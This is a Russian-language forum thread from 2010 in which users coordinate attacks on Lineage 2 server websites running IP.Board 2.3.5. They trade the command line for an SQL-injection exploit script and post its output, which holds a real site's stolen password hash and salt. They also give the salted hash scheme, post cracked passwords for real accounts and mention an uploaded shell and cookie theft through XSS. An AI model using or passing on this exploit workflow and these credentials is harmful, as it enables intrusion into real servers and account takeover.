Регистрация Главная Сообщество
Сообщения за день Справка Регистрация
Навигация
Zhyk.org LIVE! Реклама на Zhyk.org Правила Форума Награды и достижения Доска "почета"

Рабочая уязвимость на l2europe.net (сервер из топ15)

-

Баги и читы Lineage 2

- Уязвимости, баги и читы для Lineage 2 в этом разделе

Закрытая тема
 
Опции темы
Старый 22.03.2010, 00:16   #31
Заблокирован
 Капитан
Аватар для Underwhy
 
Underwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слуху
Регистрация: 22.08.2009
Сообщений: 277
Популярность: 1328
Сказал(а) спасибо: 194
Поблагодарили 472 раз(а) в 220 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

/ Using default table prefix: ibf_
- Prefix ibf_ is incorrect!
- Mysql version 4
- Get prefix impossible!


Немного от ботана-Андервая: Это значит, что база форума имеет название не "ibf_" а какое либо другое. Вам это предстоит выяснить
 
Старый 22.03.2010, 01:11   #32
Читер-спонсор
 Пехотинец
Аватар для -=Angel=-
 
-=Angel=- неизвестен в этих краях-=Angel=- неизвестен в этих краях
Регистрация: 18.04.2009
Сообщений: 74
Популярность: -165
Сказал(а) спасибо: 19
Поблагодарили 221 раз(а) в 76 сообщениях
Отправить сообщение для -=Angel=- с помощью ICQ
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Цитата:
Сообщение от NickiteeПосмотреть сообщение
Ну вот, я ввёл в [Ссылки могут видеть только зарегистрированные пользователи. ]
Хеш, салт, получил MD5, пошол в passpro, ввёл туда этот MD5, нажал брут форс, он у мя дет минут 10 пароли перебирал и ничего не нашол!
что я не так делаю? Oo

Используй лучше онлайн расшифровку хешей md5
Вот парочка из них
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]

P.S. И эта уязвимость мало где работает( я имею виду сайты la2)
Думаете на АЧ выкладывали бы эту уязвимость и тем более без хайда

Последний раз редактировалось -=Angel=-; 22.03.2010 в 01:14.
 
Старый 22.03.2010, 10:02   #33
Почетный Пользователь
 Капитан
Аватар для ExxtanzO
 
ExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского Союза
Регистрация: 21.12.2009
Сообщений: 251
Популярность: 6587
Золото Zhyk.Ru: 30
Сказал(а) спасибо: 223
Поблагодарили 533 раз(а) в 200 сообщениях
Отправить сообщение для ExxtanzO с помощью ICQ Отправить сообщение для ExxtanzO с помощью Skype™
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Цитата:
Сообщение от barrakudaПосмотреть сообщение
Знаю один пвп сервачек с онлайном 450+ в 9 утра (будний)

Форум вот такой Форум IP.Board 2.3.5 © 2010 IPS, Inc.

За консультаю по icq , скажу что за сервер

559 758 526

На таких форумах пол рунета работает, надо чтоб версия NULL была
________________
[Ссылки могут видеть только зарегистрированные пользователи. ]

Последний раз редактировалось ExxtanzO; 22.03.2010 в 10:13.
 
Старый 22.03.2010, 10:42   #34
Заблокирован
 Капитан
Аватар для Underwhy
 
Underwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слуху
Регистрация: 22.08.2009
Сообщений: 277
Популярность: 1328
Сказал(а) спасибо: 194
Поблагодарили 472 раз(а) в 220 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Цитата:
Сообщение от ExxtanzOПосмотреть сообщение
На таких форумах пол рунета работает, надо чтоб версия NULL была

На астериосе лицензия, но там эта уязвимость катит
 
Старый 22.03.2010, 10:53   #35
Почетный Пользователь
 Капитан
Аватар для ExxtanzO
 
ExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского СоюзаExxtanzO трижды герой Советского Союза
Регистрация: 21.12.2009
Сообщений: 251
Популярность: 6587
Золото Zhyk.Ru: 30
Сказал(а) спасибо: 223
Поблагодарили 533 раз(а) в 200 сообщениях
Отправить сообщение для ExxtanzO с помощью ICQ Отправить сообщение для ExxtanzO с помощью Skype™
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Цитата:
Сообщение от UnderwhyПосмотреть сообщение
На астериосе лицензия, но там эта уязвимость катит

на NULL просто в 90% случаев работает, а на лицензии маловероятно
________________
[Ссылки могут видеть только зарегистрированные пользователи. ]
 
Старый 23.03.2010, 09:00   #36
 Разведчик
Аватар для {Spiker}
 
{Spiker} никому не известный тип
Регистрация: 14.03.2010
Сообщений: 5
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Отправить сообщение для {Spiker} с помощью ICQ
 
Unhappy Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

ребят кто может подсказать какова типа етот хеш (( а то голову сломал почти уже. И весь инет перерил
Буду очень признателень спс

pass_hash=0225035e0fec4d4b39759ad37a42312b
pass_salt=c46.5
 
Старый 23.03.2010, 09:11   #37
 Пехотинец
Аватар для fuzzion
 
fuzzion на правильном пути
Регистрация: 08.02.2010
Сообщений: 62
Популярность: 52
Сказал(а) спасибо: 21
Поблагодарили 21 раз(а) в 13 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

если дергал этим сплойтом, то хеш ипб.

md5($md5(salt).md5($pass)) [PHP]
 
Пользователь сказал cпасибо:
Stuck (23.03.2010)
Старый 23.03.2010, 17:59   #38
Читер-спонсор
 Рыцарь-защитник
Аватар для Nickitee
 
Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(
Регистрация: 28.08.2009
Сообщений: 603
Популярность: 19129
Золото Zhyk.Ru: 500
Сказал(а) спасибо: 84
Поблагодарили 602 раз(а) в 321 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

Цитата:
Сообщение от Death_AnGelПосмотреть сообщение
если дергал этим сплойтом, то хеш ипб.

md5($md5(salt).md5($pass)) [PHP]

Эммм, кажеться md5(md5($salt).md5($pass))
А не md5($md5(salt).md5($pass))

Добавлено через 1 час 18 минут
Расстреляйте меня, уже час бручу хэш, толку 0, незнаю может я не те настройки поставил, опытным брутерам: "Помогите рассшифровать хэш!"
хэш:f8e929c512b16d5f8b2b285d62a148f7
соль:hAh.S
________________
We are Ducks. We are birds. We like bread. We cryack. Cryack.

Последний раз редактировалось Nickitee; 23.03.2010 в 19:17. Причина: Добавлено сообщение
 
Старый 23.03.2010, 19:27   #39
 Разведчик
Аватар для 3acuson
 
3acuson никому не известный тип
Регистрация: 27.08.2009
Сообщений: 5
Популярность: 14
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

пароль:bluxome204
шелл уже давно залил
 
Старый 23.03.2010, 20:30   #40
 Разведчик
Аватар для {Spiker}
 
{Spiker} никому не известный тип
Регистрация: 14.03.2010
Сообщений: 5
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Отправить сообщение для {Spiker} с помощью ICQ
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

Цитата:
Сообщение от Death_AnGelПосмотреть сообщение
если дергал этим сплойтом, то хеш ипб.

md5($md5(salt).md5($pass)) [PHP]

Не подходит я спецом та зарегал свой акк и пробывал пароль взломать вообше ничево не происходит. Помогите кто может я уже весь инет перерил толку 0 от етово.
З.Ы. Уже брутил и EGB / Paswordpro. 0%

Добавлено через 2 минуты
Цитата:
Сообщение от alexskbПосмотреть сообщение
ребят может кто научит не опытного ?
вот я пишу в цмд пхп.ехе но он не хочет его открывать...
можете объяснить по подробности?

Надо прописать путь к пхп.ехе, он просто так тибе не откроетса

Последний раз редактировалось {Spiker}; 23.03.2010 в 20:32. Причина: Добавлено сообщение
 
Старый 23.03.2010, 21:22   #41
Читер-спонсор
 Рыцарь-защитник
Аватар для Nickitee
 
Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(Nickitee сломал счётчик популярности :(
Регистрация: 28.08.2009
Сообщений: 603
Популярность: 19129
Золото Zhyk.Ru: 500
Сказал(а) спасибо: 84
Поблагодарили 602 раз(а) в 321 сообщениях
 
По умолчанию Re: Рабочая уязвимость на l2europe.net (сервер из топ15)

Цитата:
Сообщение от alexskbПосмотреть сообщение
ешо вопрос,вот установил я денвер на деиске ц.
а как мне к ниму пробратся черз цмд?b

Он те должен ещё "Виртуальный диск создать"
А на нём уже делать эти манипуляции
________________
We are Ducks. We are birds. We like bread. We cryack. Cryack.
 
Старый 23.03.2010, 21:29   #42
 Пехотинец
Аватар для fuzzion
 
fuzzion на правильном пути
Регистрация: 08.02.2010
Сообщений: 62
Популярность: 52
Сказал(а) спасибо: 21
Поблагодарили 21 раз(а) в 13 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

denwer тащит

Добавлено через 10 часов 58 минут
у кого там на функции ereg() ругалось, денвер свой любимый посавьте версией пониже, где пхп старый в комплекте и zend optimizer

Последний раз редактировалось fuzzion; 24.03.2010 в 08:28. Причина: Добавлено сообщение
 
Старый 24.03.2010, 09:31   #43
-= Чит-Мастер =-
 Рыцарь-защитник
Аватар для Razzor
 
Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(
Регистрация: 23.04.2008
Сообщений: 583
Популярность: 26705
Золото Zhyk.Ru: 100
Сказал(а) спасибо: 1,365
Поблагодарили 2,428 раз(а) в 666 сообщениях
Отправить сообщение для Razzor с помощью ICQ Отправить сообщение для Razzor с помощью Skype™
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Цитата:
Сообщение от UnderwhyПосмотреть сообщение
/ Using default table prefix: ibf_
- Prefix ibf_ is incorrect!
- Mysql version 4
- Get prefix impossible!


Немного от ботана-Андервая: Это значит, что база форума имеет название не "ibf_" а какое либо другое. Вам это предстоит выяснить

Или 2 вариант, там стоит IPB 3
А с 3 этот баг не прокатит.

Уточню пару нюансов, если кто не понял, сплойт работает только на IPB <=2.3.5.
На 3 выдает что не парильный префикс, если посмотреть код то можно понять, что скрипт говорит форум уязвим при условии что при переходе по спец ссылке мы видим сам форум, именно поэтому он думает, что 3 уязвима.

На 3 сейчас есть из паблика активные и пассивные XSS, можно стырить куки и подменить сессию.

Последний раз редактировалось Razzor; 24.03.2010 в 09:36.
 
Старый 24.03.2010, 10:55   #44
 Пехотинец
Аватар для alexskb
 
alexskb на правильном пути
Регистрация: 23.11.2009
Сообщений: 85
Популярность: 64
Сказал(а) спасибо: 17
Поблагодарили 57 раз(а) в 23 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

люди у меня когда я ввожу эту строку (php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки могут видеть только зарегистрированные пользователи. ] -uid 6) получается вот что:
как переделать чтоб было как на видео
[Ссылки могут видеть только зарегистрированные пользователи. ]
хотелось бы чтоб было вот так:
[Ссылки могут видеть только зарегистрированные пользователи. ]

Последний раз редактировалось alexskb; 24.03.2010 в 11:02.
 
Старый 24.03.2010, 11:08   #45
-= Чит-Мастер =-
 Рыцарь-защитник
Аватар для Razzor
 
Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(Razzor сломал счётчик популярности :(
Регистрация: 23.04.2008
Сообщений: 583
Популярность: 26705
Золото Zhyk.Ru: 100
Сказал(а) спасибо: 1,365
Поблагодарили 2,428 раз(а) в 666 сообщениях
Отправить сообщение для Razzor с помощью ICQ Отправить сообщение для Razzor с помощью Skype™
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Цитата:
Сообщение от alexskbПосмотреть сообщение
люди у меня когда я ввожу эту строку (php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки могут видеть только зарегистрированные пользователи. ] -uid 6) получается вот что:
как переделать чтоб было как на видео

Поставить более старую версию Денвера, либо скачать отдельно пхп
Держи:
Код:
 Attack(s):

 + [24.03.2010 13:02:10]
 + http://thevoshod.ru/forum/
 / IDS bypass: 1
 / Cheking sql-injection..
 + Forum vulnerable!
 / Using default table prefix: ibf_
 + Prefix ibf_ is correct
 + Using targeted user id 6
 / Trying to get the password hash
 + pass_hash=a4f9fac3593d000d3f4d03e3b668c43d
 + Ok, using hash a4f9fac3593d000d3f4d03e3b668c43d
 / Trying to get the password salt
 + pass_salt=!)#@7
 + Ok, using salt !)#@7
 + Enjoy!

 + [24.03.2010 13:05:34]
 + Total: 182
Пароль сдался быстро: 908085
 
Закрытая тема


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
l2europe dtg Базы серверов и брут 15 23.03.2010 15:04
l2europe.net phreaker Архив 25 21.03.2010 18:33
[Помогите!] У меня не сохраняется топ15, ранк!! semenronaldo9 Общение и обсуждение Counter-Strike 9 21.03.2010 14:30

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 20:36.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net